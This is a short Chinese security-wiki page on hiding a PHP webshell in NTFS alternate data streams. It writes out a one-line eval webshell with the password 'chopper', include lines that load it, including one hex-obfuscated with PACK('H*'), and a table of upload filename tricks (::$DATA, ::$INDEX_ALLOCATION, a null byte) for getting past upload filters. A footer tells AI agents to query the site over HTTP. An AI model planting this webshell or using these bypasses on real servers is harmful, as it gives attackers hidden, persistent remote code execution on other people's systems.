# ADS隐藏webshell

```
指定宿主文件，index.php是网页正常文件
>echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
<?php include(‘index.php:hidden.jpg’)?>
<?php 
$a="696E6465782E7068703"."A68696464656E2E6A7067";#hex编码
$b="a";
include(PACK('H*',$$b))
?>
>echo 9527 > 1.txt:flag.txt
>notepad 1.txt:flag.txt
或不指定宿主文件
>echo hide > :key.txt
>cd ../
>notepad test:key.txt
上传处绕过
```

| 上传的文件名                       | 服务器表面现象       | 生成的文件内容 |
| ---------------------------- | ------------- | ------- |
| test.php:a.jpg               | 生成test.php    | 空       |
| test.php::$DATA              | 生成test.php    |         |
| test.php::$INDEX\_ALLOCATION | 生成test.php文件夹 | \\      |
| test.php::$DATA\0.jpg        | 生成0.jpg       |         |


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.heresecurity.wiki/quan-xian-wei-chi/windows/ads-yin-cang-webshell.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.